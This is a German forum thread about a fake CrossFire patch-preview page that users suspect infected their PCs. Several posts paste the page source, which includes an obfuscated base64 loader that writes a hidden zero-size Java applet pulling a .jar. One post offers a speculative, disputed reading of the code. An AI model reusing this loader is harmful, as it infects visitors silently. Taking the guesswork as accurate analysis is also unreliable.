Dann Arbeitet offensichtlich was im Hintergrund. Ich hoffe wir reden nicht gegen die Wand. Das 3te mal jetzt -> Scanne deinen PC mit Spybot Search and Destroy!Quote:
Ehhm... jetzt hab ich lsngsam Angst:
Es öffnet sich jetzt immer mal wieder das cmd Fenster einfach so ohne das ich was mache...
Cpu Auslastung liegt bei 90% wenn ich nur Inet benutze und vom Arbeitsspeicher werden 2gb von 4gb benutzt!
Crossfire "Patch Review" Virus
10/16/2012 12:30
LordTourette#16
10/16/2012 12:33
Abnoo#17
Sry, hab ich vergessen dazu zu schreiben...
Hab ich schon durchlaufen lassen, hat aber nichts gefunden. Norton macht grad nen gesamten SystemScan!
Hab ich schon durchlaufen lassen, hat aber nichts gefunden. Norton macht grad nen gesamten SystemScan!
10/16/2012 13:48
defize#18
Hast du vor kurzem neue Software installiert, die womöglich deinen Pc belastet?Quote:
Es öffnet sich jetzt immer mal wieder das cmd Fenster einfach so ohne das ich was mache...
Cpu Auslastung liegt bei 90% wenn ich nur Inet benutze und vom Arbeitsspeicher werden 2gb von 4gb benutzt!
Ach und die Maus und Tastatur wurden beim Start des Laptops erstmal nicht erkannt!
Falls nicht, scheint es tatsächlich als befände sich Malware auf deinem Pc, die diesen belastet. Ich schließe dabei aber aus, dass du diese auf der Seite bekommen hast, sofern du dort weder etwas bestätigt, noch etwas eingegeben oder angeklickt hast, sondern sie einfach nur wieder geschlossen hast.
10/16/2012 14:00
Abnoo#19
Ich hab in letzter Zeit nur Hamachi installiert... mehr nicht!
Auf der Website hab ich auch nichts angeklickt.
Antivirus hat jetzt auch nix gefunden!?
Auf der Website hab ich auch nichts angeklickt.
Antivirus hat jetzt auch nix gefunden!?
10/16/2012 16:44
9olD3n9uNPl4Y3r#20
Ich hab aus neugier 'NUR AUF DEN LINK GEKLICKT' aber ich habe keine Probleme also, Cmd öffnet sich bei mir nicht, Stand PC Maus/Tastatur nimmt der LapTop beim aufdrehen sofort an :)
Also wenn du nur draufgeklickt hast, kannst du 'anscheinend' nichts haben.
Also wenn du nur draufgeklickt hast, kannst du 'anscheinend' nichts haben.
10/16/2012 18:40
Abnoo#21
Hmm ok..
Ich hab noch runtergescrollt... Kann sich dabei schon ein Script geöffnet haben oder ein download gestertet haben?
Hier der Seitenquelltext:
Ich hab noch runtergescrollt... Kann sich dabei schon ein Script geöffnet haben oder ein download gestertet haben?
Hier der Seitenquelltext:
Code:
<script type="text/javascript">
var P1nUXU9P7NfE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function wxD1RtivNfLP(Q48EcV5dWs0u) {
var CXFd6YWbhyb0 = "";
var ZaL1NoPYrgIk, QMYoYn58Nn1b, VWJLgudAlxBS = "";
var ejrzgT691GwY, bIlzAlqhKUIz, FuaWT2pD232h, t86WrJvkk36u = "";
var OwrSbUdIaKj5 = 0;
Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
ejrzgT691GwY = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
bIlzAlqhKUIz = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
FuaWT2pD232h = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
t86WrJvkk36u = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
ZaL1NoPYrgIk = (ejrzgT691GwY << 2) | (bIlzAlqhKUIz >> 4);
QMYoYn58Nn1b = ((bIlzAlqhKUIz & 15) << 4) | (FuaWT2pD232h >> 2);
VWJLgudAlxBS = ((FuaWT2pD232h & 3) << 6) | t86WrJvkk36u;
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(ZaL1NoPYrgIk);
if (FuaWT2pD232h != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(QMYoYn58Nn1b);
}
if (t86WrJvkk36u != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(VWJLgudAlxBS);
}
ZaL1NoPYrgIk = QMYoYn58Nn1b = VWJLgudAlxBS = "";
ejrzgT691GwY = bIlzAlqhKUIz = FuaWT2pD232h = t86WrJvkk36u = "";
} while (OwrSbUdIaKj5 < Q48EcV5dWs0u.length);
return unescape(CXFd6YWbhyb0);
}
document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg=="));
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
Cross Fire - Patch Preview - Undead Update: Day 2
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="description" content="The Undead Update featuring ZOMBIE MODE is coming to Cross Fire September 15th, 2011! Check back for new info every day leading up to the release. Today: INTRODUCING THE SWARM!" /><meta name="keywords" content="crossfire, cross fire, zombies, zombie mode, patch, update, dlc, mutation, mutants, co-op, co op, coop, free-to-play, free to play, military, shooter, fps, free fps, free online fps, first-person shooter, first person shooter" /></head>
<script type="text/javascript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
</head>
<body style=" background-repeat:repeat-y; margin: 0 0 0 0; background-color:#670b0b; background-position:center">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" height="58" align="center" valign="top" style="background-color:#000"><table width="960" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="57"> <div id="div_loginframe">
<iframe id="loginHeader" frameborder="0" style="height: 65px; width: 998px; border: 0; background-color: Transparent;" allowtransparency="true"
scrolling="no" src="http://www.z8games.com/Loging/GlobeLogin.aspx?from=&subid=&b=cf&page="></iframe>
</div> </td>
</tr>
<tr>
</table></td>
</tr>
<tr>
<td height="2200" align="center" valign="top" style=" background-image:url(images/landing/new_landing/halloween/halloween_patch_bg.jpg);background-repeat:no-repeat; background-position:center; background-position:top"><table width="960" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="185" align="left" valign="top"><table width="950" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="457" height="66" align="left" valign="bottom"><a href="http://crossfire.z8games.com"><img src="images/landing/new_landing/zombie_mode/logo.png" width="452" height="61" border="0" /></a></td>
<td width="503" align="right" valign="top"><table width="400" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="28" align="right"><a href="http://www.facebook.com/sharer.php" share_url="http://crossfire.z8games.com/halloween_update.aspx" name="fb_share" id="fb_share" type="button_count">Share</a>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script></td>
<td width="40"></td>
<td align="left">
<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="491" align="right" valign="bottom"><table width="400" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="39"> </td>
<td width="153" align="center" valign="middle"> </td>
<td width="186"><a href="http://crossfire.z8games.com/events_page.aspx"><img src="images/landing/new_landing/halloween/click_details_btn.jpg" width="173" height="43" border="0" /></a></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="200" align="center" valign="bottom" style="background-color:#000;background-repeat:no-repeat; background-position:center; background-position:top"><table width="1000" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="69" colspan="4" align="center" valign="bottom"><table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120" height="46"><p style="color:#999; font-size:18px; font:Verdana, Geneva, sans-serif; font-weight:bold">Follow Us On:</p></td>
<td width="60" align="center" valign="middle"><a href="http://www.facebook.com/crossfireonline"><img src="images/landing/new_landing/zombie_mode/facebook_btn.png" width="53" height="52" border="0" /></a></td>
<td width="60" align="center" valign="middle"><a href="http://www.youtube.com/crossfireonline"><img src="images/landing/new_landing/zombie_mode/youtube_btn.png" width="53" height="52" border="0" /></a></td>
<td width="60" align="center" valign="middle"><a href="http://twitter.com/#!/crossfireonline"><img src="images/landing/new_landing/zombie_mode/twitter_btn.png" width="53" height="52" border="0" /></a></td>
<td width="60" align="center" valign="middle"><a href="http://www.xfire.com/communities/crossfireonline/"><img src="images/landing/new_landing/zombie_mode/xfire_btn.png" width="53" height="52" border="0" /></a></td>
</tr>
</table></td>
</tr>
<tr>
<td width="37" height="140"> </td>
<td width="312" align="left" valign="middle"><table width="310" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120" height="25" align="left" valign="middle"><a href="http://www.z8games.com/privacypolicy.aspx" style="color:#F90; font-size:12px;">Privacy Policy</a></td>
<td width="190" align="left" valign="middle"><a href="http://www.z8games.com/termsandcondition.aspx" style="color:#F90; font-size:12px">Terms and Conditions</a></td>
</tr>
<tr>
<td height="20" colspan="2"><p style="color:#999; font-size:10px;">COPYRIGHT @ 2006-2011 G4BOX INC. ALL RIGHTS RESERVED<br />
@ NEOWIZ GAMES. ALL RIGHTS RESERVED<br />
COPYRIGHT @ SMILEGATE. ALL RIGHTS RESERVED<br />
All other trademarks are property of their respective owners</p></td>
</tr>
</table></td>
<td width="610"><img src="images/landing/new_landing/zombie_mode/logos.jpg" width="610" height="115" /></td>
<td width="41"> </td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>
10/17/2012 07:42
LordTourette#22
Quote:
Ich hab noch runtergescrollt... Kann sich dabei schon ein Script geöffnet haben oder ein download gestertet haben?
Hier der Seitenquelltext:
Code:<script type="text/javascript"> var P1nUXU9P7NfE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function wxD1RtivNfLP(Q48EcV5dWs0u) { var CXFd6YWbhyb0 = ""; var ZaL1NoPYrgIk, QMYoYn58Nn1b, VWJLgudAlxBS = ""; var ejrzgT691GwY, bIlzAlqhKUIz, FuaWT2pD232h, t86WrJvkk36u = ""; var OwrSbUdIaKj5 = 0; Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { ejrzgT691GwY = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++)); bIlzAlqhKUIz = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++)); FuaWT2pD232h = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++)); t86WrJvkk36u = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++)); ZaL1NoPYrgIk = (ejrzgT691GwY << 2) | (bIlzAlqhKUIz >> 4); QMYoYn58Nn1b = ((bIlzAlqhKUIz & 15) << 4) | (FuaWT2pD232h >> 2); VWJLgudAlxBS = ((FuaWT2pD232h & 3) << 6) | t86WrJvkk36u; CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(ZaL1NoPYrgIk); if (FuaWT2pD232h != 64) { CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(QMYoYn58Nn1b); } if (t86WrJvkk36u != 64) { CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(VWJLgudAlxBS); } ZaL1NoPYrgIk = QMYoYn58Nn1b = VWJLgudAlxBS = ""; ejrzgT691GwY = bIlzAlqhKUIz = FuaWT2pD232h = t86WrJvkk36u = ""; } while (OwrSbUdIaKj5 < Q48EcV5dWs0u.length); return unescape(CXFd6YWbhyb0); } document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg==")); </script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="Head1"><title> Cross Fire - Patch Preview - Undead Update: Day 2 </title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="description" content="The Undead Update featuring ZOMBIE MODE is coming to Cross Fire September 15th, 2011! Check back for new info every day leading up to the release. Today: INTRODUCING THE SWARM!" /><meta name="keywords" content="crossfire, cross fire, zombies, zombie mode, patch, update, dlc, mutation, mutants, co-op, co op, coop, free-to-play, free to play, military, shooter, fps, free fps, free online fps, first-person shooter, first person shooter" /></head> <script type="text/javascript"> <!-- function MM_preloadImages() { //v3.0 var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } //--> </script> </head> <body style=" background-repeat:repeat-y; margin: 0 0 0 0; background-color:#670b0b; background-position:center"> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="100%" height="58" align="center" valign="top" style="background-color:#000"><table width="960" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="57"> <div id="div_loginframe"> <iframe id="loginHeader" frameborder="0" style="height: 65px; width: 998px; border: 0; background-color: Transparent;" allowtransparency="true" scrolling="no" src="http://www.z8games.com/Loging/GlobeLogin.aspx?from=&subid=&b=cf&page="></iframe> </div> </td> </tr> <tr> </table></td> </tr> <tr> <td height="2200" align="center" valign="top" style=" background-image:url(images/landing/new_landing/halloween/halloween_patch_bg.jpg);background-repeat:no-repeat; background-position:center; background-position:top"><table width="960" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="185" align="left" valign="top"><table width="950" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="457" height="66" align="left" valign="bottom"><a href="http://crossfire.z8games.com"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/logo.png" width="452" height="61" border="0" /></a></td> <td width="503" align="right" valign="top"><table width="400" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="28" align="right"><a href="http://www.facebook.com/sharer.php" share_url="http://crossfire.z8games.com/halloween_update.aspx" name="fb_share" id="fb_share" type="button_count">Share</a> <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script></td> <td width="40"></td> <td align="left"> <a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal">Tweet</a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></td> </tr> </table></td> </tr> </table></td> </tr> <tr> <td height="491" align="right" valign="bottom"><table width="400" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="39"> </td> <td width="153" align="center" valign="middle"> </td> <td width="186"><a href="http://crossfire.z8games.com/events_page.aspx"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/halloween/click_details_btn.jpg" width="173" height="43" border="0" /></a></td> </tr> </table></td> </tr> </table></td> </tr> <tr> <td height="200" align="center" valign="bottom" style="background-color:#000;background-repeat:no-repeat; background-position:center; background-position:top"><table width="1000" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="69" colspan="4" align="center" valign="bottom"><table border="0" cellpadding="0" cellspacing="0"> <tr> <td width="120" height="46"><p style="color:#999; font-size:18px; font:Verdana, Geneva, sans-serif; font-weight:bold">Follow Us On:</p></td> <td width="60" align="center" valign="middle"><a href="http://www.facebook.com/crossfireonline"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/facebook_btn.png" width="53" height="52" border="0" /></a></td> <td width="60" align="center" valign="middle"><a href="http://www.youtube.com/crossfireonline"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/youtube_btn.png" width="53" height="52" border="0" /></a></td> <td width="60" align="center" valign="middle"><a href="http://twitter.com/#!/crossfireonline"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/twitter_btn.png" width="53" height="52" border="0" /></a></td> <td width="60" align="center" valign="middle"><a href="http://www.xfire.com/communities/crossfireonline/"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/xfire_btn.png" width="53" height="52" border="0" /></a></td> </tr> </table></td> </tr> <tr> <td width="37" height="140"> </td> <td width="312" align="left" valign="middle"><table width="310" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="120" height="25" align="left" valign="middle"><a href="http://www.z8games.com/privacypolicy.aspx" style="color:#F90; font-size:12px;">Privacy Policy</a></td> <td width="190" align="left" valign="middle"><a href="http://www.z8games.com/termsandcondition.aspx" style="color:#F90; font-size:12px">Terms and Conditions</a></td> </tr> <tr> <td height="20" colspan="2"><p style="color:#999; font-size:10px;">COPYRIGHT @ 2006-2011 G4BOX INC. ALL RIGHTS RESERVED<br /> @ NEOWIZ GAMES. ALL RIGHTS RESERVED<br /> COPYRIGHT @ SMILEGATE. ALL RIGHTS RESERVED<br /> All other trademarks are property of their respective owners</p></td> </tr> </table></td> <td width="610"><img src="http://www.elitepvpers.com/forum/images/landing/new_landing/zombie_mode/logos.jpg" width="610" height="115" /></td> <td width="41"> </td> </tr> </table></td> </tr> </table> </body> </html>
Habe ich bereits gesagt mit dem Anhang des Videos. Wenn ein Javascript auf der Website eingebettet ist startet es automatisch! Da brauchst du nichts anklicken oder sonst was. Wenn du Java drauf hast aber nicht das NoScript Plugin dann wird das Script ausgeführt!
Ich bin jetzt kein Programmierer aber ich finde 2 Scripte.
Der erste hat viele verwirrende Variablen wo ich nicht mehr hinterherkomme. Wie gesagt ich hab nie mit Java gearbeitet.
Code:
<script type="text/javascript">
var P1nUXU9P7NfE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function wxD1RtivNfLP(Q48EcV5dWs0u) {
var CXFd6YWbhyb0 = "";
var ZaL1NoPYrgIk, QMYoYn58Nn1b, VWJLgudAlxBS = "";
var ejrzgT691GwY, bIlzAlqhKUIz, FuaWT2pD232h, t86WrJvkk36u = "";
var OwrSbUdIaKj5 = 0;
Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
ejrzgT691GwY = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
bIlzAlqhKUIz = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
FuaWT2pD232h = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
t86WrJvkk36u = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
ZaL1NoPYrgIk = (ejrzgT691GwY << 2) | (bIlzAlqhKUIz >> 4);
QMYoYn58Nn1b = ((bIlzAlqhKUIz & 15) << 4) | (FuaWT2pD232h >> 2);
VWJLgudAlxBS = ((FuaWT2pD232h & 3) << 6) | t86WrJvkk36u;
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(ZaL1NoPYrgIk);
if (FuaWT2pD232h != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(QMYoYn58Nn1b);
}
if (t86WrJvkk36u != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(VWJLgudAlxBS);
}
ZaL1NoPYrgIk = QMYoYn58Nn1b = VWJLgudAlxBS = "";
ejrzgT691GwY = bIlzAlqhKUIz = FuaWT2pD232h = t86WrJvkk36u = "";
} while (OwrSbUdIaKj5 < Q48EcV5dWs0u.length);
return unescape(CXFd6YWbhyb0);
}
document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg=="));
</script>
Code:
<script type="text/javascript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
10/17/2012 07:54
Dominikchaos#23
Schau mal bei deinen Dokumenten ob du den Ordner DSCMIN hast den per hand löschen und papierkorb leeren danach unter task manager mal schauen nach cvtres.exe diesen Prozess beenden und dann Nochmal Spybot aber um 100% sicher zu gehen formatier dein pc neu
Zur seite die hier immer gesagt wird sie ist richtig komisch alles ist rot dann stehen irgendwie deine acc daten bereits oben drin von z8games.com und danach fordert es dich auf ein Zertifikat aus zu führen ich habs gehmacht -.- und naja seit dem hab ich diesen dcsmin und cvtres.exe dreck da hab aber gestern pc neu aufgesetzt würde ich dir auch empfehlen
Zur seite die hier immer gesagt wird sie ist richtig komisch alles ist rot dann stehen irgendwie deine acc daten bereits oben drin von z8games.com und danach fordert es dich auf ein Zertifikat aus zu führen ich habs gehmacht -.- und naja seit dem hab ich diesen dcsmin und cvtres.exe dreck da hab aber gestern pc neu aufgesetzt würde ich dir auch empfehlen
10/17/2012 19:21
rmN]2k12#24
Ich habe auch draufgeklickt, hab einfach meinen PC zurückgesetzt und habe keine Probleme bis jetzt
10/17/2012 20:13
TannerIsBack#25
so ein aufwand wegen so ein paar kiddies -.- ich hasse es richtig !
Im Pc neu machen dies das ...
Den sollten man mal so ein Virus auf den Pc klatschen das der nichts mehr machen kann !
Im Pc neu machen dies das ...
Den sollten man mal so ein Virus auf den Pc klatschen das der nichts mehr machen kann !
10/17/2012 20:49
Mirco'#26
Zurücksetzen hilft nicht immer, wenn du pech hast hat er sich auch noch in den registry einträgen rein geschriben o.Ä. Ich würde dir lieber empfehlen dein Betriebssystem neu zuinstalieren.Quote:
____
PHP Code:
<script type="text/javascript">
var P1nUXU9P7NfE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function wxD1RtivNfLP(Q48EcV5dWs0u) {
var CXFd6YWbhyb0 = "";
var ZaL1NoPYrgIk, QMYoYn58Nn1b, VWJLgudAlxBS = "";
var ejrzgT691GwY, bIlzAlqhKUIz, FuaWT2pD232h, t86WrJvkk36u = "";
var OwrSbUdIaKj5 = 0;
Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
ejrzgT691GwY = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
bIlzAlqhKUIz = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
FuaWT2pD232h = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
t86WrJvkk36u = P1nUXU9P7NfE.indexOf(Q48EcV5dWs0u.charAt(OwrSbUdIaKj5++));
ZaL1NoPYrgIk = (ejrzgT691GwY << 2) | (bIlzAlqhKUIz >> 4);
QMYoYn58Nn1b = ((bIlzAlqhKUIz & 15) << 4) | (FuaWT2pD232h >> 2);
VWJLgudAlxBS = ((FuaWT2pD232h & 3) << 6) | t86WrJvkk36u;
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(ZaL1NoPYrgIk);
if (FuaWT2pD232h != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(QMYoYn58Nn1b);
}
if (t86WrJvkk36u != 64) {
CXFd6YWbhyb0 = CXFd6YWbhyb0 + String.fromCharCode(VWJLgudAlxBS);
}
ZaL1NoPYrgIk = QMYoYn58Nn1b = VWJLgudAlxBS = "";
ejrzgT691GwY = bIlzAlqhKUIz = FuaWT2pD232h = t86WrJvkk36u = "";
} while (OwrSbUdIaKj5 < Q48EcV5dWs0u.length);
return unescape(CXFd6YWbhyb0);
}
PHP Code:
document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg=="));
</script>
Für mich sieht es so aus
PHP Code:
var OwrSbUdIaKj5 = 0 , Q48EcV5dWs0u = Q48EcV5dWs0u.replace(/[^A-Za-z0-9\+\/\=]/g, "")
Heißt die var OwrSbUdIaKj5 ersetzt alle Tasten auf der Tastatur
PHP Code:
(/[^A-Za-z0-9\+\/\=]/g, "")
PHP Code:
document.write(wxD1RtivNfLP("DQoJCQk8YXBwbGV0IHdpZHRoPScwcHgnIGhlaWdodD0nMHB4JyBjb2RlPSdKYXZhX01vdmllX1BsYXllci5jbGFzcycgYXJjaGl2ZT0nMzUxYzgwYjRjMTM0OTcyMTJmZTU5NjYxYTVmMTMyNDQuamFyJz4NCgkJCTwvYXBwbGV0Pg=="));
Und dann wird noch ein Screenshot von var document gemacht sprich von euren eingaben, die bekommt er auch nochmal geschickt.
PHP Code:
<script type="text/javascript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
//-->
</script>
Die ganzen var sind dafür da das die Anti Viren Programme nicht anspringen und auch verwirrt sind, damit er ein leichtes Spiel hat. Kann sein das ich falsch liege aber für mich sieht es eben so aus.
An eure stelle würde ich einfach Windows neuinstalieren und davor die Festplatte/n Formatieren.
10/17/2012 21:12
defize#27
Nochmal:
Wenn man auf der Seite nichts angeklickt, die Ausführung eines Java Scripts nicht bestätigt hat und nichts eingegeben hat, dann habt ihr höchstwahrscheinlich auch keinen Virus!
Ende! hat mir dies noch einmal bestätigt.
Mirco, deine Theorie ist leider völlig inkorrekt.
Wenn man auf der Seite nichts angeklickt, die Ausführung eines Java Scripts nicht bestätigt hat und nichts eingegeben hat, dann habt ihr höchstwahrscheinlich auch keinen Virus!
Ende! hat mir dies noch einmal bestätigt.
Mirco, deine Theorie ist leider völlig inkorrekt.
10/18/2012 00:05
Abnoo#28
Naja ich hab bis jetzt nichts mehr gemerkt... (PC zurückgesetzt)
Und will auch meinen PC nicht neu aufsetzen da ich dann ne externe zum Datensichern anschließen muss und da kann der Virus dann ja auch draufspringen... und ... und ... und .....
Ich schau mal ob was passiert dann kann ich (hoffentlich) immernoch handeln!
Und will auch meinen PC nicht neu aufsetzen da ich dann ne externe zum Datensichern anschließen muss und da kann der Virus dann ja auch draufspringen... und ... und ... und .....
Ich schau mal ob was passiert dann kann ich (hoffentlich) immernoch handeln!
10/18/2012 06:41
defize#29
Ich weise dich jetzt noch einmal darauf hin, da du offensichtlich nicht auf die einzigen Posts in diesem Thread, die nicht wilde Spekulationen ahnungsloser User enthalten, eingehen willst. Schon der erste Post in diesem Thread hätte deine Frage eigentlich beantwortet.Quote:
Und will auch meinen PC nicht neu aufsetzen da ich dann ne externe zum Datensichern anschließen muss und da kann der Virus dann ja auch draufspringen... und ... und ... und .....
Ich schau mal ob was passiert dann kann ich (hoffentlich) immernoch handeln!
Du sagtest, dass du auf der Seite nichts angeklickt oder die Ausführung des Java Scripts bestätigt hast. In diesem Fall hast du dich auch 100% nicht mit Malware von der Seite infiziert. Und selbst wenn du die Ausführung bestätigt hättest, hätte jedes herkömmliche Antivirenprogramm den Virus, der dann übrigens eure Firefox Passwörter ausgelesen hätte, dann erkannt.Quote:
Wenn man auf der Seite nichts angeklickt, die Ausführung eines Java Scripts nicht bestätigt hat und nichts eingegeben hat, dann habt ihr höchstwahrscheinlich auch keinen Virus!
Ende! hat mir dies noch einmal bestätigt.
Mirco, deine Theorie ist leider völlig inkorrekt.
Wenn dein Pc tatsächlich mit Malware infiziert war, dann jedenfalls nicht von der Seite.
10/18/2012 13:37
alaska321#30
Ich habe die Ausführung bestätigt,woraufhin mein Antivir Program anging und es blockierte,also dürfte nichts passiert sein eigentlich?Quote:
Wenn dein Pc tatsächlich mit Malware infiziert war, dann jedenfalls nicht von der Seite.